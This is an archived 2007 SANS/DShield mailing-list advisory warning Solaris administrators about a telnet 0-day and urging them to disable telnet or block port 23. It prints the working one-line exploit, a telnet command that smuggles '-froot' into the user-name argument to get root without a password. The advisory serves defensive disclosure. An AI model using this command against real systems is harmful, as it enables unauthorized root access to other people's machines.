[Dshield] Solaris Telnet 0-day (Important!)
Johannes B. Ullrich
jullrich at sans.org
Sun Feb 11 21:22:23 GMT 2007
If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial Solaris
telnet 0-day.
telnet -l "-froot" [hostname]
will give you root on many Solaris systems with default installs
We are still testing. Please use our contact form at
https://isc.sans.org/contact.html
if you have any details about the use of this exploit.
--
---------
Johannes Ullrich http://isc.sans.org
SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
taught by our top rated instructors plus a huge vendor tools expo.
Register Today! <http://www.sans.org/info/2501>
(Brochurecode: ISC)
PGP Key: https://secure.dshield.org/PGPKEYS
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 249 bytes
Desc: OpenPGP digital signature
Url : http://lists.sans.org/pipermail/list/attachments/20070211/d8e01253/attachment.bin
More information about the list
mailing list